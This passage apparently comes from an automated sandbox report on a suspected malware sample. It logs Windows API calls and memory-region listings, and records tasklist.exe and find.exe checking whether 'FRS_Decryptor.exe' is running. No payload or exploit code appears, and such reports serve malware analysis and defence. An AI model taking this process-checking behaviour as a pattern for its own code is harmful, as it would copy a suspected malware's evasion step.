(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0106.697] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0106.697] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xb6f408*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xb6f454 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xb6f454*(hProcess=0x60, hThread=0x54, dwProcessId=0x83c, dwThreadId=0x914)) returned 1 [0106.700] CloseHandle (hObject=0x54) returned 1 [0106.700] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.700] GetEnvironmentStringsW () returned 0xeaad78* [0106.700] FreeEnvironmentStringsA (penv="=") returned 1 [0106.700] DeleteProcThreadAttributeList (in: lpAttributeList=0xb6f480 | out: lpAttributeList=0xb6f480) [0106.700] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0106.700] _close (_FileHandle=4) returned 0 [0106.700] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0107.129] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xb6f7c8 | out: lpExitCode=0xb6f7c8*=0x0) returned 1 [0107.130] CloseHandle (hObject=0x64) returned 1 [0107.130] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0107.132] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xb6f7c8 | out: lpExitCode=0xb6f7c8*=0x0) returned 1 [0107.132] CloseHandle (hObject=0x60) returned 1 [0107.132] _get_osfhandle (_FileHandle=1) returned 0x158 [0107.132] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0107.132] _get_osfhandle (_FileHandle=1) returned 0x158 [0107.132] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0107.132] _get_osfhandle (_FileHandle=0) returned 0x24 [0107.132] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0107.132] SetConsoleInputExeNameW () returned 0x1 [0107.132] GetConsoleOutputCP () returned 0x1b5 [0107.132] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0107.132] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.133] exit (_Code=0) Process: id = "103" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0xc00b000" os_pid = "0x834" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "102" os_parent_pid = "0x80c" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5307 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 5308 start_va = 0x240000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 5309 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 5310 start_va = 0x270000 end_va = 0x27efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 5311 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5312 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 5313 start_va = 0x300000 end_va = 0x303fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 5314 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 5315 start_va = 0x320000 end_va = 0x321fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 5316 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5317 start_va = 0x7e5f0000 end_va = 0x7e612fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e5f0000" filename = "" Region: id = 5318 start_va = 0x7e615000 end_va = 0x7e615fff entry_point = 0x0 region_type = private name = "private_0x000000007e615000" filename = "" Region: id = 5319 start_va = 0x7e616000 end_va = 0x7e616fff entry_point = 0x0 region_type = private name = "private_0x000000007e616000" filename = "" Region: id = 5320 start_va = 0x7e61d000 end_va = 0x7e61ffff entry_point = 0x0 region_type = private name = "private_0x000000007e61d000" filename = "" Region: id = 5321 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5322 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5323 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5324 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5344 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 5345 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5346 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5347 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5364 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 5365 start_va = 0x250000 end_va = 0x253fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 5366 start_va = 0x260000 end_va = 0x262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 5367 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 5368 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 5369 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 5370 start_va = 0x370000 end_va = 0x3edfff entry_point = 0x370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5371 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 5372 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5373 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 5374 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5375 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 5376 start_va = 0x5e0000 end_va = 0x767fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 5377 start_va = 0x770000 end_va = 0x8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 5378 start_va = 0x900000 end_va = 0x1cfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 5379 start_va = 0x1d00000 end_va = 0x1e41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d00000" filename = "" Region: id = 5380 start_va = 0x1e50000 end_va = 0x2124fff entry_point = 0x1e50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5381 start_va = 0x2130000 end_va = 0x252bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" Region: id = 5382 start_va = 0x73470000 end_va = 0x734d0fff entry_point = 0x73470000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5383 start_va = 0x734e0000 end_va = 0x734ebfff entry_point = 0x734e0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5384 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 5385 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5386 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5387 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5388 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 5389 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5390 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5391 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 5392 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5393 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5394 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5395 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5396 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5397 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5398 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5399 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5400 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5401 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5402 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5403 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5404 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5405 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5406 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5407 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5408 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5409 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5410 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5411 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5412 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5413 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5414 start_va = 0x7e4f0000 end_va = 0x7e5effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e4f0000" filename = "" Region: id = 5415 start_va = 0x73420000 end_va = 0x73461fff entry_point = 0x73420000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5416 start_va = 0x550000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 5417 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 5418 start_va = 0x2530000 end_va = 0x256ffff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 5419 start_va = 0x2570000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 5420 start_va = 0x25b0000 end_va = 0x25effff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5421 start_va = 0x25f0000 end_va = 0x262ffff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 5422 start_va = 0x73410000 end_va = 0x7341ffff entry_point = 0x73410000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5423 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5424 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5425 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 5426 start_va = 0x7e4ed000 end_va = 0x7e4effff entry_point = 0x0 region_type = private name = "private_0x000000007e4ed000" filename = "" Region: id = 5427 start_va = 0x7e617000 end_va = 0x7e619fff entry_point = 0x0 region_type = private name = "private_0x000000007e617000" filename = "" Region: id = 5428 start_va = 0x7e61a000 end_va = 0x7e61cfff entry_point = 0x0 region_type = private name = "private_0x000000007e61a000" filename = "" Region: id = 5429 start_va = 0x73360000 end_va = 0x7340afff entry_point = 0x73360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Thread: id = 290 os_tid = 0x4c4 Thread: id = 292 os_tid = 0x120 Thread: id = 293 os_tid = 0x528 Thread: id = 294 os_tid = 0x75c Process: id = "104" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x61ada000" os_pid = "0x83c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "102" os_parent_pid = "0x80c" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5326 start_va = 0xf50000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 5327 start_va = 0xf70000 end_va = 0xf71fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 5328 start_va = 0xf80000 end_va = 0xf8efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 5329 start_va = 0xf90000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 5330 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 5331 start_va = 0x1010000 end_va = 0x1013fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001010000" filename = "" Region: id = 5332 start_va = 0x1020000 end_va = 0x1020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 5333 start_va = 0x1030000 end_va = 0x1031fff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 5334 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 5335 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5336 start_va = 0x7f510000 end_va = 0x7f532fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f510000" filename = "" Region: id = 5337 start_va = 0x7f534000 end_va = 0x7f534fff entry_point = 0x0 region_type = private name = "private_0x000000007f534000" filename = "" Region: id = 5338 start_va = 0x7f53c000 end_va = 0x7f53efff entry_point = 0x0 region_type = private name = "private_0x000000007f53c000" filename = "" Region: id = 5339 start_va = 0x7f53f000 end_va = 0x7f53ffff entry_point = 0x0 region_type = private name = "private_0x000000007f53f000" filename = "" Region: id = 5340 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5341 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5342 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5343 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5348 start_va = 0x1130000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 5349 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5350 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5351 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5352 start_va = 0xf50000 end_va = 0xf5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 5353 start_va = 0xf60000 end_va = 0xf63fff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 5354 start_va = 0xf70000 end_va = 0xf73fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 5355 start_va = 0x1040000 end_va = 0x10bdfff entry_point = 0x1040000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5356 start_va = 0x1100000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 5357 start_va = 0x11e0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 5358 start_va = 0x734f0000 end_va = 0x734fefff entry_point = 0x734f0000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 5359 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") 